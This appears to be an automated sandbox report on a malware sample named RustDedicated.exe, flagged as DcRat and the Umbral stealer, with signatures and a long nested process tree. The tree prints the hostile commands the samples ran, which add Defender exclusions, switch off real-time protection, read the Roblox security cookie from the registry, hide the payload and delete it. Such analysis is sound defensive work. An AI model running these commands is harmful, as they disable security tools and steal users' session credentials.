Analysis
-
max time kernel
83s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
02-01-2025 18:44
General
-
Target
RustDedicated.exe
-
Size
1.2MB
-
MD5
80802d3e9eb3978b02891a1846900e64
-
SHA1
c44fe9d1f8c5f6deabfdcfc1ab9e9d4cff4e5cd8
-
SHA256
1aed0b69955713ca30ddcbd0b36ea83aebc10494fc6eafd64175c1a43d1c64c6
-
SHA512
0fabd76a7f746dde9a9326e1a486a7b6f61f542f0f88a20c0092cc6d8385d6f4e768db2ba78317340c70094a5a6c8b319958b5f08efec91c2d258d23bd1026a2
-
SSDEEP
12288:sJ+ii04vDu/1Hp8CoFxH1sB5jVC6+0AsMLkL57dROq3r3hAj7haqgQY+9LGtYSQe:jin0ulOCoFkA6+0vpwAQhBwYSBYFBav
Score
10/10
Malware Config
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Dcrat family
-
Detect Umbral payload 2 IoCs
-
Process spawned unexpected child process 36 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
UAC bypass 3 TTPs 3 IoCs
-
Umbral
Umbral stealer is an opensource moduler stealer written in C#.
-
Umbral family
-
DCRat payload 3 IoCs
Detects payload of DCRat, commonly dropped by NSIS installers.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 48 IoCs
Using powershell.exe command.
-
Drops file in Drivers directory 4 IoCs
-
Checks computer location settings 2 TTPs 64 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 64 IoCs
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks whether UAC is enabled 1 TTPs 2 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 24 IoCs
-
Looks up external IP address via web service 12 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in Program Files directory 11 IoCs
-
Drops file in Windows directory 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 24 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Detects videocard installed 1 TTPs 12 IoCs
Uses WMIC.exe to determine videocard installed.
-
Modifies registry class 36 IoCs
-
Runs ping.exe 1 TTPs 12 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 36 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 63 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 3 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 12 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"6⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"9⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"10⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"11⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"12⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"13⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"14⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"15⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"16⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"17⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"18⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"19⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"20⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"21⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"22⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"23⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"24⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"25⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"26⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"27⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"28⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"29⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"30⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"31⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"32⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"33⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"34⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"35⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"36⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"37⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"38⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"39⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"40⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"41⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"42⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"43⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"44⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"45⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"46⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"47⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"48⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"49⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"50⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"51⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"52⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"53⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"54⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"55⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"56⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"57⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"58⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"59⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"60⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"61⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"62⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"63⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"64⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"65⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"66⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"67⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"68⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"69⤵
-
C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"C:\Users\Admin\AppData\Local\Temp\RustDedicated.exe"70⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"70⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"69⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"70⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"70⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"68⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"69⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"69⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"70⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"67⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"68⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"68⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"69⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"70⤵
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"66⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"67⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"67⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"68⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"69⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "70⤵
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"71⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"65⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"66⤵
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid67⤵
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"67⤵
- Views/modifies file attributes
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'67⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 267⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY67⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY67⤵
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption67⤵
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory67⤵
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid67⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER67⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name67⤵
- Detects videocard installed
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause67⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\system32\PING.EXEping localhost68⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"66⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"67⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"68⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "69⤵
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"70⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"64⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"65⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"65⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"66⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"67⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "68⤵
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"69⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"63⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"64⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"64⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"65⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"66⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "67⤵
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"68⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"62⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"63⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"63⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"64⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"65⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "66⤵
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"67⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"61⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"62⤵
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid63⤵
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"63⤵
- Views/modifies file attributes
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'63⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 263⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY63⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY63⤵
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption63⤵
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory63⤵
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid63⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER63⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name63⤵
- Detects videocard installed
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause63⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\system32\PING.EXEping localhost64⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"62⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"63⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"64⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "65⤵
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"66⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"60⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"61⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"61⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"62⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"63⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "64⤵
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"65⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"59⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"60⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"60⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"61⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"62⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "63⤵
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"64⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"58⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"59⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"59⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"60⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"61⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "62⤵
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"63⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"57⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"58⤵
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid59⤵
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"59⤵
- Views/modifies file attributes
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'59⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 259⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY59⤵
- Command and Scripting Interpreter: PowerShell
-
-
